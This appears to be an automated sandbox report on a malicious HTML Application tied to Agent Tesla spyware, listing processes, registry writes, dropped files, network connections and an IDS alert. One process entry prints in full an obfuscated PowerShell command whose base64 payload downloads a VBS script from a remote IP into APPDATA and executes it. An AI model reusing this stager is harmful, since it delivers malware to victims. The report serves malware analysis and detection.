| File name: | seemebestthingsevermeetgivenbestthingsfornewways.hta |
| Full analysis: | https://app.any.run/tasks/12b7e03a-16d3-4289-acad-249f55bf43ab |
| Verdict: | Malicious activity |
| Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
| Analysis date: | May 15, 2025, 10:41:37 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/javascript |
| File info: | JavaScript source, ASCII text, with very long lines (47158), with CRLF line terminators |
| MD5: | E90AE8EC16EA2056CAAA64AC13A31373 |
| SHA1: | 8041A1BDA3769B97D8E8B980C6A77FCD2829D715 |
| SHA256: | DF215A01F6A83014A148C6E407CDC8422E9119A88B4220A1321B2986EA9AEF63 |
| SSDEEP: | 384:gLezlvdbmgM8m956YSmzBB5CtbHA7lvRvw:gOlvBvm956YfwTARZ4 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 536 | "C:\WINDOWS\system32\UCPDMgr.exe" | C:\Windows\System32\UCPDMgr.exe | — | svchost.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: User Choice Protection Manager Exit code: 0 Version: 1.0.0.414301 Modules
| |||||||||||||||
| 1228 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | |||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: KMS Connection Broker Exit code: 0 Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1328 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2092 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | UCPDMgr.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2136 | "C:\Windows\SysWOW64\mshta.exe" C:\Users\admin\AppData\Local\Temp\seemebestthingsevermeetgivenbestthingsfornewways.hta {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | C:\Windows\SysWOW64\mshta.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4756 | PoWershElL.Exe -Ex ByPasS -nOP -W 1 -c dEVICEcreDEntIalDEPloyMenT.ExE ; InvokE-eXPResSIon($(iNVOKE-expRESSIoN('[SySteM.text.encOdINg]'+[CHAr]0X3A+[char]58+'Utf8.gETsTRinG([sYsTEM.COnVErt]'+[ChAr]58+[cHar]58+'froMBaSe64StRiNg('+[Char]0x22+'JE51UCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJERWZJTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4cVlHeEdyWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaUl5TFJrdkNMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuSFBGUlV1YmcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6Q3V2SmZGQXpFRCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga3d1b2lhKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsUlMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG9GdXhhcFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTnVQOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi4zMS41L2NvbW9uc3RyYWludHMudmJzIiwiJGVudjpBUFBEQVRBXGNvbW9uc3RyYWludGNvbW9uc3RyYWludC52YlMiLDAsMCk7U1RBcnQtU0xlRXAoMyk7aU5WT0tlLWVYcHJFU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxjb21vbnN0cmFpbnRjb21vbnN0cmFpbnQudmJTIg=='+[CHaR]0x22+'))')))" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4920 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | UCPDMgr.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5008 | "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent | C:\Windows\System32\slui.exe | SppExtComObj.Exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Activation Client Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5512 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\yqpgmcoi.cmdline" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 5528 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESE3F9.tmp" "c:\Users\admin\AppData\Local\Temp\CSC965CA9E2721A4C33AD3F5EBEDBC86010.TMP" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 14.32.31326.0 Modules
| |||||||||||||||
| (PID) Process: | (2136) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (2136) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (2136) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (4756) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (4756) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (4756) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5528 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESE3F9.tmp | binary | |
MD5:5B418EE25F9A810A7019D3A702240C31 | SHA256:AC7718538E87A597A5965DC5EA2EDE7B38B85EE0149F5D1A2C17E8BC3E0DC250 | |||
| 5512 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC965CA9E2721A4C33AD3F5EBEDBC86010.TMP | binary | |
MD5:605977521CE564AF40ACD00C39981A05 | SHA256:7CEA12BFF580BA487D9E42B263910F3B43BE869E9DEDD81C55C9B3A8AC8FFA02 | |||
| 4756 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h0btvt0r.2yl.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5512 | csc.exe | C:\Users\admin\AppData\Local\Temp\yqpgmcoi.dll | executable | |
MD5:D966B3E9B56F98DEF9D5F19B2C478178 | SHA256:C0DED1CB464C66B26B2B2EF3E9BD8DEEA6ECF16B123208BBEF61DDD5C1A6A150 | |||
| 4756 | powershell.exe | C:\Users\admin\AppData\Local\Temp\yqpgmcoi.0.cs | text | |
MD5:D45E7F702955B47E8C43351B2A39B35F | SHA256:B730273FA9C6CD7287AD416767B5E608124F2A5066518DBA592B2B7FB25AF71A | |||
| 4756 | powershell.exe | C:\Users\admin\AppData\Local\Temp\yqpgmcoi.cmdline | text | |
MD5:0158120256A4798736A8B959A4C79764 | SHA256:457BFA2A751FCE9147E60852C6AEA60021480CF5D2B66926918051F0C55E1099 | |||
| 5512 | csc.exe | C:\Users\admin\AppData\Local\Temp\yqpgmcoi.out | text | |
MD5:43207390F3E8CAC075699FCBE7F73A38 | SHA256:6C9B9529656D5D9F85164EAEA01E27879B57E4039065B4CA2299B30EE67A339C | |||
| 4756 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:41C0C07A162A7A2A4A6C46D0C87E59F9 | SHA256:EA17ED1232B91FF19ADA7589E65620FCDB40581FFD46E36D6884136A042DEAC8 | |||
| 4756 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fflacs2m.dfx.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4756 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sca5klez.gsq.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4756 | powershell.exe | GET | 404 | 107.172.31.5:80 | http://107.172.31.5/comonstraints.vbs | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
6544 | svchost.exe | 20.190.159.4:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
2112 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
2104 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4756 | powershell.exe | 107.172.31.5:80 | — | AS-COLOCROSSING | US | unknown |
5256 | SIHClient.exe | 20.109.210.53:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
5256 | SIHClient.exe | 20.3.187.198:443 | fe3cr.delivery.mp.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
198.187.3.20.in-addr.arpa |
| unknown |
6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa |
| unknown |
activation-v2.sls.microsoft.com |
| whitelisted |
nexusrules.officeapps.live.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
4756 | powershell.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host VBS Request |